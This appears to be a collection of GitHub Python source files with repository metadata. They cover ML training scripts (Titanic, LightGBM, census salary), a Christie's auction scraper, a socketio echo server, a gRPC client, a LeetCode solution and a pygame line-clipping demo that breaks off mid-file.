('normalizer', StandardScaler())\n])\n\n# 2.1.3 Combining the two pipilines\npreprocessing_pipe = ColumnTransformer(\n transformers=[\n # ('name', Transformer, [column names])\n ('num', numerical_pipe, numerical_features),\n ('cat', categorical_pipe, categorical_features)]\n)\n\n# 2.1.4 Adding the LightGBM classifier to the pipeline\nfull_pipe = Pipeline(steps=[\n ('preprocessor', preprocessing_pipe),\n ('clf', LGBMClassifier(n_estimators=20, random_state=42))\n])\n\n# 3. Train the model using full_pipe\nmodel = full_pipe.fit(X_train, y_train)\n\nprint(f'Train accuracy: {model.score(X_train, y_train):.2f}')\nprint(f'Test accuracy: {model.score(X_test, y_test):.2f}')\n\n# 4. For hyperparameter tuning and explainability, refer to\n# https://github.com/ml6team/quick-tips/blob/main/structured_data/2021_02_26_scikit_learn_pipelines/scikit_learn_pipelines_and_lightgbm_titanic_dataset.ipynb\n\n# 5. Save the model to GCP bucket:\n","repo_name":"pankajrsingla/vertexai_ml6","sub_path":"skl-lgbm/training/trainer/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"906103565","text":"\"\"\"\nThe sinking of the RMS Titanic is one of the most infamous shipwrecks in history. On April 15, 1912, during her maiden voyage, \nthe Titanic sank after colliding with an iceberg, killing 1502 out of 2224 passengers and crew. This sensational tragedy shocked the \ninternational community and led to better safety regulations for ships. One of the reasons that the shipwreck led to such loss of life \nwas that there were not enough lifeboats for the passengers and crew. Although there was some element of luck involved in surviving the\nsinking, some groups of people were more likely to survive than others, such as women, children, and the upper-class. In this challenge, \nwe ask you to complete the analysis of what sorts of people were likely to survive. In particular, we ask you to apply the tools of \nmachine learning to predict which passengers survived the tragedy. \n\"\"\"\n\n#Since code is written in Jupyter Notebook, print statements will be missing at some places\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score,confusion_matrix,classification_report\nfrom sklearn.model_selection import train_test_split\n\ntrain = pd.read_csv('../../../../train.csv')\ntest = pd.read_csv('../../../../test.csv')\ntrain.head()\n\n#Checking if any Null Values exist\nprint(train.isnull().sum())\n\n#Visualizing survived vs not-survived\nsns.countplot(x='Survived',data=train)\n\n#Which Gender was more in ship\nsns.countplot(x='Sex',data=train)\n\n#Finding count of female and male persons\ntrain[train['Sex']=='female'].count()\ntrain[train['Sex']=='male'].count()\n\n#Checking which class had max population\nsns.countplot(x='Pclass',data=train)\n\n#People of which class survived more\nsns.countplot(data=train,hue='Pclass',x='Survived')\n\n#Which Gender survived more\nsns.countplot(x='Survived',hue='Sex',data=train)\n\n#Getting statistical details about data\ntrain.describe()\n\ntrain2 = train.copy()\n#Preparing data now\n\n#First filling mean age to null values of Age column\ntrain2['Age']=train2['Age'].fillna((int(train2['Age'].mean())))\n\n#Since Cabin column has very high quantity of null values and also it doesn't seems that important, so dropping that column\ntrain2.drop('Cabin',axis=1,inplace=True)\n\n#Embarked column has only 2 null values , so going for mode we got \"S\" is most occured\ntrain2['Embarked'].mode()\ntrain2['Embarked'].fillna(\"s\", inplace = True) \n\nprint(train2.isnull().sum()) # Got that no null value exists now\n\n#Changing data to numeric one; Changing column-> Sex,PClass and Embarked\nsex = pd.get_dummies(train2[\"Sex\"])\nembarked = pd.get_dummies(train2[\"Embarked\"])\npclass = pd.get_dummies(train2[\"Pclass\"])\n\n#Concating new data\ntrain2=pd.concat([train2,pclass,sex,embarked],axis=1)\n\n#Dropping not much-useful columns \ntrain2.drop([\"PassengerId\",\"Pclass\",\"Name\",\"Sex\",\"Ticket\",\"Embarked\"],axis=1,inplace=True)\n\n#Our data is ready now. Starting model training\n\nx = train2.drop(\"Survived\",axis=1)\ny = train2[\"Survived\"]\n\ntrain_x,test_x,train_y,test_y = train_test_split(x,y,test_size=.2,random_state=52)\nlg=LogisticRegression()\nlg.fit(train_x,train_y)\nprint(lg.score(train_x,train_y)) # 0.8061797752808989\n\n# Trying with other models\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\n\ngnb = GaussianNB()\ngnb.fit(train_x,train_y)\nprint(gnb.score(train_x,train_y)) # 0.7865168539325843\n\nknn = KNeighborsClassifier()\nknn.fit(train_x,train_y)\nprint(knn.score(train_x,train_y)) # 0.800561797752809\n\nsvc = SVC()\nsvc.fit(train_x,train_y)\nprint(svc.score(train_x,train_y)) # 0.9002808988764045\n\nrf = RandomForestClassifier()\nrf.fit(train_x,train_y)\nprint(rf.score(train_x,train_y)) # 0.9691011235955056\n\ndt = DecisionTreeClassifier()\ndt.fit(train_x,train_y)\nprint(dt.score(train_x,train_y)) # 0.9845505617977528 The best we got still\n\npred = dt.predict(test_x)\nprint(pred)\n\nprint(accuracy_score(test_y,pred)) # 0.7541899441340782\nprint(confusion_matrix(test_y,pred))\n\n# Saving this model\nimport pickle\n\nfo = open('ti.obj','wb')\npickle.dump(dt,fo)\nfo.close()\n\nfl = open('ti.obj','rb')\nres = pickle.load(fl)\nfl.close()\n\nprint(res.score(train_x,train_y)) # 0.9845505617977528\n\n\n\n\n\n","repo_name":"nikzzastic/DS-Assignments_Projects","sub_path":"Assignment 3(Titanic).py","file_name":"Assignment 3(Titanic).py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14034035252","text":"from collections import Iterable, Iterator, Container\nclass Reverse:\n \n def __init__(self, data):\n self.data = data\n self.index = len(data)\n \n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index == 0:\n raise StopIteration\n self.index = self.index-1\n return self.data[self.index]\n\nrev = Reverse('bubbyqi')\nwhile True:\n try:\n x = next(rev)\n print(x)\n except StopIteration:\n break","repo_name":"bubbyqi/python","sub_path":"iterator.py","file_name":"iterator.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16156587860","text":"from aiohttp import web\nimport socketio\nimport json\n\nsio = socketio.AsyncServer(cors_allowed_origins='*')\napp = web.Application()\nsio.attach(app)\n\nasync def index(request):\n \"\"\"Serve the client-side application.\"\"\"\n with open('index.html') as f:\n return web.Response(text=f.read(), content_type='text/html')\n\n@sio.event\ndef connect(sid, environ):\n print(\"connect \", sid)\n\n# @sio.event\n# async def chat_message(sid, data):\n# print(\"message \", data)\n\n@sio.event\ndef disconnect(sid):\n print('disconnect ', sid)\n\n@sio.on(\"input\")\nasync def echo_input(sid, data):\n print(\"Server received message\", sid, data)\n parsed_data = json.loads(data)\n echo_msg = parsed_data[\"command\"]\n await sio.emit(\"input-response\", echo_msg)\n\napp.router.add_get('/', index)\n\nif __name__ == '__main__':\n web.run_app(app)","repo_name":"uyentruong-iceye/cli-emulator","sub_path":"xterm-server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3731120154","text":"#!/usr/bin/env python\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException, NoSuchElementException\nimport requests\nimport hashlib\nimport io\nimport time\nimport os\nimport sys\nimport csv\n\n\ndef accept_cookies():\n try:\n allow_cookies = wd.find_element_by_css_selector(\n \"#onetrust-accept-btn-handler\")\n allow_cookies.click()\n except Exception as e:\n pass\n\n\ndef close_signup():\n try:\n close_button = wd.find_element_by_css_selector(\n \"#close_signup\")\n close_button.click()\n except Exception as e:\n pass\n\n\ndef scroll_to_bottom(wd):\n wd.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n\ndef wait_for_elements(wait):\n try:\n wait.until(\n lambda wd:\n EC.presence_of_element_located(\n (By.CSS_SELECTOR, \".chr-auction-header__auction-title\")) and\n EC.presence_of_all_elements_located(\n (By.CSS_SELECTOR, \".chr-lot-tile__link\")) and\n EC.presence_of_element_located(\n (By.CSS_SELECTOR, '[data-title=\"Browse Lots\"], [data-track=\"page_nav|lots\"]'))\n )\n except Exception as e:\n print(f\"wait exception: {e}\")\n\n\ndef get_auction_title(wd):\n try:\n\n auction_title_element = WebDriverWait(wd, 5).until(\n EC.presence_of_element_located((By.CSS_SELECTOR,\n \".chr-auction-header__auction-title\"))\n )\n\n # auction_title_element = wd.find_element_by_css_selector(\n # \".chr-auction-header__auction-title\")\n\n return auction_title_element.text.lower()\n except Exception as e:\n print(f\"auction title error: {e}\")\n return \"\"\n\n# def get_piece_titles(wd):\n# try:\n# title_elements = wd.find_elements_by_xpath(\n# \"//*[@class='chr-lot-tile__primary-title']\")\n\n# return [e.text.lower().strip() for e in title_elements]\n\n# except TimeoutException as e:\n# print(f\"piece titles error {e}\")\n# return []\n# except NoSuchElementException as e:\n# print(f\"piece titles error {e}\")\n# return []\n\n\ndef get_num_lots(wd):\n try:\n lot_num_text = WebDriverWait(wd, 5).until(\n EC.presence_of_element_located((By.CSS_SELECTOR,\n '[data-title=\"Browse Lots\"], [data-track=\"page_nav|lots\"]'))\n ).text\n\n # lot_num_text = wd.find_element_by_css_selector(\n # '[data-title=\"Browse Lots\"], [data-track=\"page_nav|lots\"]').text\n\n return int(''.join(c for c in lot_num_text if c.isdigit()))\n except Exception as e:\n print(f\"num lots error {e}\")\n return 0\n\n\ndef scrape_auction(wd, link, keyword_dict):\n wd.get(link)\n\n accept_cookies()\n close_signup()\n scroll_to_bottom(wd)\n\n asian_piece_count = 0\n\n auction_title = get_auction_title(wd)\n print(f\"\\nAuction Title: {auction_title}\")\n\n num_lots = get_num_lots(wd)\n print(f\"\\nNum Lots: {num_lots}\")\n\n match = False\n\n for keyword in keyword_dict:\n\n if keyword in auction_title:\n\n match = True\n\n keyword_dict[keyword] += num_lots\n\n if match:\n asian_piece_count += num_lots\n\n return (asian_piece_count, num_lots, 1 if match else 0)\n\n\ndef scrape_auctions(wd, auction_links, keyword_dict):\n\n asian_piece_count = 0\n total_piece_count = 0\n asian_auction_count = 0\n\n for link in auction_links:\n\n result = scrape_auction(wd, link, keyword_dict)\n asian_piece_count += result[0]\n total_piece_count += result[1]\n asian_auction_count += result[2]\n\n print(keyword_dict)\n\n return (asian_piece_count, total_piece_count, asian_auction_count, len(auction_links))\n\n\ndef scrape_christies(year):\n\n print(f\"FOR YEAR {year}\\n\")\n\n keyword_dict = {\"chinese\": 0,\n \"china\": 0,\n \"korean\": 0,\n \"korea\": 0,\n \"japanese\": 0,\n \"japan\": 0,\n \"orient\": 0,\n \"dynasty\": 0,\n \"asian\": 0,\n \"asia\": 0,\n \"year\": year}\n\n result_dict = {\n \"asian_piece_count\": 0,\n \"total_piece_count\": 0,\n \"piece_ratio\": 0.0,\n \"asian_auction_count\": 0,\n \"total_auction_count\": 0,\n \"auction_ratio\": 0.0,\n \"year\": year,\n }\n\n base_url = \"https://www.christies.com/en/results?\"\n\n for month in range(1, 13):\n\n print(F\"\\nMONTH {month}\\n\")\n\n wd.get(f\"{base_url}month={month}&year={year}\")\n\n accept_cookies()\n close_signup()\n\n try:\n auction_link_elements = wd.find_elements_by_css_selector(\n \".chr-event-tile__title\")\n\n auction_links = [e.get_attribute('href')\n for e in auction_link_elements]\n\n result = scrape_auctions(wd,\n auction_links, keyword_dict)\n\n result_dict[\"asian_piece_count\"] += result[0]\n result_dict[\"total_piece_count\"] += result[1]\n result_dict[\"piece_ratio\"] = result_dict[\"asian_piece_count\"] / \\\n result_dict[\"total_piece_count\"]\n\n result_dict[\"asian_auction_count\"] += result[2]\n result_dict[\"total_auction_count\"] += result[3]\n result_dict[\"auction_ratio\"] = result_dict[\"asian_auction_count\"] / \\\n result_dict[\"total_auction_count\"]\n\n print(result_dict)\n print(keyword_dict)\n\n except Exception as e:\n print(f\"{e} for year {year} and month {month}\")\n\n filename = \"new_christies_auction_keywords.csv\"\n fields = list(keyword_dict.keys())\n file_exists = os.path.isfile(filename)\n\n write_to_csv(filename, fields, file_exists, keyword_dict)\n\n filename = \"new_christies_auction_overall.csv\"\n fields = list(result_dict.keys())\n file_exists = os.path.isfile(filename)\n\n write_to_csv(filename, fields, file_exists, result_dict)\n\n\ndef write_to_csv(filename, fields, file_exists, data):\n with open(filename, 'a') as csvfile:\n # creating a csv dict writer object\n writer = csv.DictWriter(csvfile, fieldnames=fields)\n\n if not file_exists:\n writer.writeheader() # file doesn't exist yet, write a header\n\n # writing data rows\n writer.writerows([data])\n\n\nCHROMEDRIVER_PATH = \"./drivers/chromedriver\"\nchrome_bin = os.environ.get(\"GOOGLE_CHROME_BIN\", \"chromedriver\")\noptions = webdriver.ChromeOptions()\noptions.binary_location = \"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome\"\noptions.add_argument(\"--headless\")\nwd = webdriver.Chrome(executable_path=CHROMEDRIVER_PATH,\n options=options)\n\ntry:\n scrape_christies(sys.argv[1])\nexcept Exception as e:\n print(e)\n\nwd.quit()\n","repo_name":"alexwang177/art-scraper","sub_path":"python_scripts/art_scrape.py","file_name":"art_scrape.py","file_ext":"py","file_size_in_byte":7090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40193378824","text":"# Script to train machine learning model.\nfrom joblib import dump, load\nfrom sklearn.model_selection import train_test_split\nfrom starter.ml.data import process_data\nfrom starter.ml.model import *\nimport pandas as pd\n\n# Add the necessary imports for the starter code.\n# Add code to load in the data.\ndef get_model(data_path: str,output_path: str, feature: str):\n data=pd.read_csv(data_path)\n # Optional enhancement, use K-fold cross validation instead of a train-test split.\n train, test = train_test_split(data, test_size=0.20)\n\n cat_features = [\n \"workclass\",\n \"education\",\n \"marital-status\",\n \"occupation\",\n \"relationship\",\n \"race\",\n \"sex\",\n \"native-country\",\n ]\n\n # Proces the test data with the process_data function.\n X_train, y_train, encoder, lb = process_data(\n train, categorical_features=cat_features, label=\"salary\", training=True\n )\n X_test, y_test,encoder,lb = process_data(\n test, categorical_features=cat_features, label=\"salary\", training=False, encoder=encoder,lb=lb)\n # Train and save a model.\n lg=train_model(X_train,y_train)\n preds=inference(lg,X_test)\n precision, recall, fbeta = compute_model_metrics(y_test, preds)\n dump(lg,str(output_path + 'model.pkl'))\n dump(encoder,str(output_path + 'encoder.pkl'))\n dump(lb,str(output_path + 'lb.pkl'))\n with open('slice_output.txt', 'w') as f:\n for val in test[feature].unique():\n df=test[test[feature] == val]\n X, y, encoder, lb = process_data(\n df, categorical_features=cat_features, label=\"salary\", training=False,encoder=encoder,lb=lb)\n preds=inference(lg,X)\n precision_, recall_, fbeta_ = compute_model_metrics(y, preds)\n f.write(f\"score for {val}: precision: {precision_} recall: {recall_} fbeta: {fbeta_} \\n\")\n return precision, recall, fbeta \n\"\"\"\ndef splice_testing(data_path: str, model_path: str, feature: str) -> None:\n cat_features = [\n \"workclass\",\n \"education\",\n \"marital-status\",\n \"occupation\",\n \"relationship\",\n \"race\",\n \"sex\",\n \"native-country\",\n ]\n model=load(model_path)\n data=pd.read_csv(data_path)\n train, test = train_test_split(data, test_size=0.20)\n X_train, y_train, encoder, lb = process_data(\n train, categorical_features=cat_features, label=\"salary\", training=True)\n with open('../slice_output.txt', 'w') as f:\n for val in test[feature].unique():\n df=test[test[feature] == val]\n X, y, encoder, lb = process_data(\n df, categorical_features=cat_features, label=\"salary\", training=False,encoder=encoder,lb=lb)\n preds=inference(model,X)\n precision, recall, fbeta = compute_model_metrics(y, preds)\n f.write(f\"score for {val}: precision: {precision} recall: {recall} fbeta: {fbeta} \\n\")\n\"\"\"","repo_name":"nadorijakab/feladat","sub_path":"starter/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17214053764","text":"class Solution:\n def isScramble(self, s1, s2):\n \"\"\"\n you just have to recursively compare all the possible cases, and the question is not clear about how we can split the string, bad question\n \"\"\"\n memo = {}\n \n def helper(s1, s2):\n if not s1 or not s2: return False\n if s1 == s2: return True\n if sorted(s1) != sorted(s2): return False\n \n if (s1, s2) in memo: return memo[s1,s2]\n \n ans = False\n for i in range(len(s1)):\n if ((helper(s1[:i], s2[:i]) and helper(s1[i:], s2[i:])) or\n (helper(s1[:i], s2[-i:]) and helper(s1[i:], s2[:-i]))):\n ans = True\n break\n\n memo[(s1, s2)] = ans\n return ans\n \n return helper(s1, s2)","repo_name":"yunkaiwang/LeetCodeSol","sub_path":"algorithms/87_ScrambleString.py","file_name":"87_ScrambleString.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12054838199","text":"import timeit\n\nfrom gefest.core.opt.gen_design import design\nfrom cases.heat.configuration_dl import heat_sampler, heat_estimator\nfrom cases.main_conf import opt_params\n\n# If the value is False, pretrained models will be selected\n# otherwise put path to your model\nopt_params.path_to_sampler = False\nopt_params.path_to_estimator = False\n\n# ------------\n# GEFEST tools configuration\n# ------------\n\nestimator = heat_estimator.configurate_estimator(path_to_cnn=opt_params.path_to_estimator)\nsampler = heat_sampler.configurate_sampler(domain=None, path_to_sampler=opt_params.path_to_sampler)\noptimizer = None\n\n# ------------\n# Generative design stage\n# ------------\n\nstart = timeit.default_timer()\noptimized_pop = design(n_steps=opt_params.n_steps,\n pop_size=opt_params.pop_size,\n estimator=estimator,\n sampler=sampler,\n optimizer=optimizer)\nspend_time = timeit.default_timer() - start\nprint(f'spent time {spend_time} sec')\n","repo_name":"aimclub/GEFEST","sub_path":"cases/heat/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"} +{"seq_id":"29099953259","text":"import weather_pb2, weather_pb2_grpc\nimport sys, os\nimport grpc\ndef main():\n with grpc.insecure_channel(\"localhost:3333\", options=(('grpc.enable_http_proxy', 0),)) as chan:\n stub = weather_pb2_grpc.ServiceStub(chan)\n city = sys.argv[1]\n res = stub.getWeather(weather_pb2.WeatherRequest(city=city))\n val = int(res.temp_info)\n print(f\"The Temperature in {city} {val} degrees\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"ternyavsky/rpc_python-go","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41431889731","text":"#1. Реализовать алгоритм Цируса-Бека отсечения отрезка многоугольником. ok\r\n#2. Реализовать алгоритм Сазерленда-Коэна. ok\r\n#3. Реализовать алгоритм средней точки.\r\n\r\nimport sys,os,pygame,pygame_gui\r\nfrom math import tan,pi,fabs,atan2,sin,cos,copysign,sqrt\r\nfrom functools import partial\r\nfrom turtle import back, width\r\nsign = partial(copysign, 1)\r\ndef chsign(val:float):return -val\r\nfrom pygame import draw,display,time,quit,init,freetype,font\r\nfrom pygame_gui.core import UIElement\r\nfrom config import *\r\n\r\n#отрисовка координатной сетки\r\ndef decart():\r\n _font:freetype.Font = freetype.SysFont(font.get_fonts()[0],12)\r\n draw.line(background,RED,ToWorldCoords([DIS_WIDTH/2,0]),ToWorldCoords([-DIS_WIDTH/2,0]))\r\n draw.line(background,RED,ToWorldCoords([0 ,DIS_HEIGHT/2]),ToWorldCoords([0,-DIS_HEIGHT/2]))\r\n for x in range(-int(DIS_WIDTH/2),int(DIS_WIDTH/2)+PIX_SIZE,PIX_SIZE):\r\n for y in range(-int(DIS_HEIGHT/2),int(DIS_HEIGHT/2)+PIX_SIZE,PIX_SIZE):\r\n if y == 0 or x == 0:\r\n draw.circle(background,LIGHT_BLUE,ToWorldCoords([x,y]),1)\r\n text = _font.render(str(x) if y == 0 else str(y), fgcolor=LIGHT_BLUE,size=12)\r\n background.blit(text[0],dest=ToWorldCoords([x-9,y-5]))\r\n\r\ndef set_rect(x,y,xs,ys):\r\n return pygame.Rect(ToWorldCoords((DIS_WIDTH/2-x, DIS_HEIGHT/2-y)), (xs, ys))\r\n\r\ndef set_slider(x,y,xs=250,ys=25,sv=-DIS_WIDTH/2+5,ev=DIS_WIDTH/2-5,dv=0):\r\n return pygame_gui.elements.UIHorizontalSlider(\r\n relative_rect = set_rect(x,y,xs,ys),value_range=[sv,ev],start_value=dv,manager=manager)\r\n\r\ndef set_textbox(x,y,xs=50,ys=25):\r\n return pygame_gui.elements.UITextEntryLine(relative_rect = set_rect(x,y,xs,ys),manager=manager)\r\n\r\ndef set_button(t,x,y,xs=300,ys=25):\r\n return pygame_gui.elements.UIButton(relative_rect=set_rect(x,y,xs,ys),text=t,manager=manager)\r\n\r\ndef init_ui() -> dict[str,UIElement]:\r\n ui:dict[str,UIElement] = {\r\n \"DRAW_POLYGON\":set_button('нарисовать полигон',300,0),\r\n \"DRAW_RECTANGLE\":set_button('нарисовать прямоугольник',300,25),\r\n \"OXPC\":set_slider(300,50),\"OXPCTB\":set_textbox(50,50),\r\n \"OYPC\":set_slider(300,75),\"OYPCTB\":set_textbox(50,75),\r\n \"DRAW_LINE\":set_button('нарисовать отрезок',300,100),\r\n \"OX1LC\":set_slider(300,125),\"OX1LCTB\":set_textbox(50,125),\r\n \"OY1LC\":set_slider(300,150),\"OY1LCTB\":set_textbox(50,150),\r\n \"OX2LC\":set_slider(300,175),\"OX2LCTB\":set_textbox(50,175),\r\n \"OY2LC\":set_slider(300,200),\"OY2LCTB\":set_textbox(50,200),\r\n \"CUT_LINE_1\":set_button('отсечь отрезок',300,225),\r\n \"CUT_LINE_2\":set_button('отсечь отрезок 1 способом',300,225),\r\n \"CUT_LINE_3\":set_button('отсечь отрезок 2 способом',300,250),\r\n }\r\n ui[\"CUT_LINE_1\"].hide()\r\n ui[\"CUT_LINE_2\"].hide()\r\n ui[\"CUT_LINE_3\"].hide()\r\n return ui\r\n\r\ndef chain_ui():\r\n def tb_n_sl(sl,tb,v):\r\n all_ui_elements[sl].set_current_value(float(v))\r\n all_ui_elements[tb].set_text(str(v))\r\n tb_n_sl(\"OXPC\",\"OXPCTB\",polygon_coords[0]);tb_n_sl(\"OYPC\",\"OYPCTB\",polygon_coords[1])\r\n tb_n_sl(\"OX1LC\",\"OX1LCTB\",line_coords[0][0]);tb_n_sl(\"OY1LC\",\"OY1LCTB\",line_coords[0][1])\r\n tb_n_sl(\"OX2LC\",\"OX2LCTB\",line_coords[1][0]);tb_n_sl(\"OY2LC\",\"OY2LCTB\",line_coords[1][1])\r\n\r\ninit()\r\nmanager = pygame_gui.UIManager((DIS_WIDTH, DIS_HEIGHT))\r\nwindow_surface=display.set_mode((DIS_WIDTH,DIS_HEIGHT))\r\nbackground = pygame.Surface((DIS_WIDTH, DIS_HEIGHT))\r\nclock = time.Clock()\r\ngame_over=False\r\ntime_delta = 0\r\nall_ui_elements = init_ui()\r\nrender_pipe:list[dict] = []\r\nline_coords = [[0,0],[0,0]]\r\npolygon_coords = [0,0]\r\nrender_pipe.append({});render_pipe.append({})\r\nrender_pipe.append({});render_pipe.append({})\r\nrender_pipe[1].update({\"decart\":partial(decart)})\r\n\r\n\r\n\r\ndef draw_vect_line(dis,col,srtp,endp):draw.line(dis,col,srtp(),endp())\r\n\r\ndef draw_vect_polygon(dis,col,model,cntr):\r\n draw.polygon(dis,col,[[x[0]+cntr()[0],-x[1]+cntr()[1]] for x in model],width=1)\r\n\r\ndef draw_cut_line_1(dis,fcol,scol,srtp,endp,model,pcntr):\r\n srtp,endp,pcntr = ToScreenCoords(srtp()),ToScreenCoords(endp()),ToScreenCoords(pcntr())\r\n polygon = [[x[0]+pcntr[0],x[1]+pcntr[1]] for x in model]\r\n x0,y0,t0,t1 = endp[0]-srtp[0],endp[1]-srtp[1],0,1\r\n for p1,p2 in zip(list(reversed(polygon)),list(reversed(polygon))[1:]+list(reversed(polygon))[:1]):\r\n (x1,y1),(x2,y2) = p1,p2\r\n nx,ny = y1-y2,x2-x1#вектор нормали к стороне\r\n p = nx*x0 + ny*y0#скалярное произведение векторов Dck\r\n wx,wy = srtp[0]-x1,srtp[1]-y1\r\n q = nx*wx+ny*wy#Wck\r\n if p != 0:\r\n t = -q/p\r\n if p > 0 :\r\n if t > 1:\r\n draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(endp))\r\n return\r\n else:t0 = max(t,t0)\r\n else:\r\n if t < 0:\r\n draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(endp))\r\n return\r\n else:t1 = min(t,t1)\r\n else:\r\n if q <0:\r\n draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(endp))\r\n return\r\n if t0 <= t1:\r\n fp = [srtp[0]+t0*(endp[0]-srtp[0]),srtp[1]+t0*(endp[1]-srtp[1])]\r\n sp = [srtp[0]+t1*(endp[0]-srtp[0]),srtp[1]+t1*(endp[1]-srtp[1])]\r\n draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(fp))\r\n draw.line(dis,fcol,ToWorldCoords(sp),ToWorldCoords(endp))\r\n draw.line(dis,scol,ToWorldCoords(fp),ToWorldCoords(sp))\r\n else:\r\n draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(endp))\r\n\r\ndef draw_cut_line_2(dis,fcol,scol,srtp,endp,model,pcntr):\r\n srtp,endp,pcntr = ToScreenCoords(srtp()),ToScreenCoords(endp()),ToScreenCoords(pcntr())\r\n pol = [[x[0]+pcntr[0],x[1]+pcntr[1]] for x in model]\r\n x_min,y_min,x_max,y_max = pol[0][0],pol[0][1],pol[0][0],pol[0][1]\r\n for x,y in pol:x_min,y_min,x_max,y_max = min(x_min,x), min(y_min,y),max(x_max,x),max(y_max,y)\r\n def code(p):\r\n return int(\r\n str(int(p[1] > y_max))+# 8 TOP\r\n str(int(p[1] < y_min))+# 4 BOT\r\n str(int(p[0] > x_max))+# 2 RIGHT\r\n str(int(p[0] < x_min)) # 1 LEFT\r\n ,2)\r\n\r\n LEFT,RIGHT,BOT,TOP = 1,2,4,8\r\n fp,sp,fpc,spc = srtp,endp,code(srtp),code(endp)\r\n print(fpc,spc)\r\n while(fpc | spc):\r\n if (fpc & spc):draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(endp));return\r\n\t\t# выбираем точку c с ненулевым кодом \r\n nnpc,nnp = (fpc,fp) if fpc else (spc,sp)\r\n dx,dy = fp[0] - sp[0],fp[1] - sp[1]\r\n if (nnpc & LEFT):nnp = [x_min,nnp[1] + dy * (x_min - nnp[0]) / dx]\r\n elif (nnpc & RIGHT):nnp = [x_max,nnp[1] + dy * (x_max - nnp[0]) / dx]\r\n elif (nnpc & BOT):nnp = [nnp[0]+dx * (y_min - nnp[1]) / dy,y_min]\r\n elif (nnpc & TOP):nnp = [nnp[0]+dx * (y_max - nnp[1]) / dy,y_max]\r\n if (nnpc == fpc):fp,fpc = nnp,code(nnp)\r\n else:sp,spc = nnp,code(nnp)\r\n \r\n draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(fp))\r\n draw.line(dis,scol,ToWorldCoords(fp),ToWorldCoords(sp))\r\n draw.line(dis,fcol,ToWorldCoords(sp),ToWorldCoords(endp))\r\n\r\ndef draw_cut_line_3(dis,fcol,scol,srtp,endp,model,pcntr):\r\n srtp,endp,pcntr = ToScreenCoords(srtp()),ToScreenCoords(endp()),ToScreenCoords(pcntr())\r\n pol = [[x[0]+pcntr[0],x[1]+pcntr[1]] for x in model]\r\n x_min,y_min,x_max,y_max = pol[0][0],pol[0][1],pol[0][0],pol[0][1]\r\n for x,y in pol:x_min,y_min,x_max,y_max = min(x_min,x), min(y_min,y),max(x_max,x),max(y_max,y)\r\n def code(p):\r\n return int(\r\n str(int(p[1] > y_max))+# 8 TOP\r\n str(int(p[1] < y_min))+# 4 BOT\r\n str(int(p[0] > x_max))+# 2 RIGHT\r\n str(int(p[0] < x_min)) # 1 LEFT\r\n ,2)\r\n\r\n ACCURACY = 10\r\n\r\n def check(a,b):#возвращает либо None либо две точки\r\n ac,bc = code(a),code(b)\r\n if(ac | bc):\r\n if(ac & bc):return None\r\n m = [(a[0]+b[0])/2,(a[1]+b[1])/2]\r\n if (abs(a[0]-b[0]) < ACCURACY) and (abs(a[1]-b[1]) < ACCURACY):return [a,b]\r\n amv,mbv = check(a,m),check(m,b)\r\n if amv != None:\r\n if mbv != None:return [amv[0],mbv[1]]\r\n else:return amv\r\n else:return mbv\r\n else:return [a,b]\r\n\r\n fsv = check(srtp,endp)\r\n if fsv != None:\r\n draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(fsv[0]))\r\n draw.line(dis,scol,ToWorldCoords(fsv[0]),ToWorldCoords(fsv[1]))\r\n draw.line(dis,fcol,ToWorldCoords(fsv[1]),ToWorldCoords(endp))\r\n else: \r\n draw.line(dis,fcol,ToWorldCoords(srtp),ToWorldCoords(endp))\r\n return\r\n \r\n\r\n \r\n \r\n\r\n\r\nwhile not game_over:\r\n background.fill(0)\r\n time_delta = clock.tick(60)/1000.0\r\n \r\n for event in pygame.event.get():\r\n if event.type==pygame.QUIT:\r\n game_over=True\r\n\r\n if event.type == pygame_gui.UI_HORIZONTAL_SLIDER_MOVED:\r\n if event.ui_element == all_ui_elements[\"OXPC\"]:polygon_coords[0] = int(event.value)\r\n if event.ui_element == all_ui_elements[\"OYPC\"]:polygon_coords[1] = int(event.value)\r\n if event.ui_element == 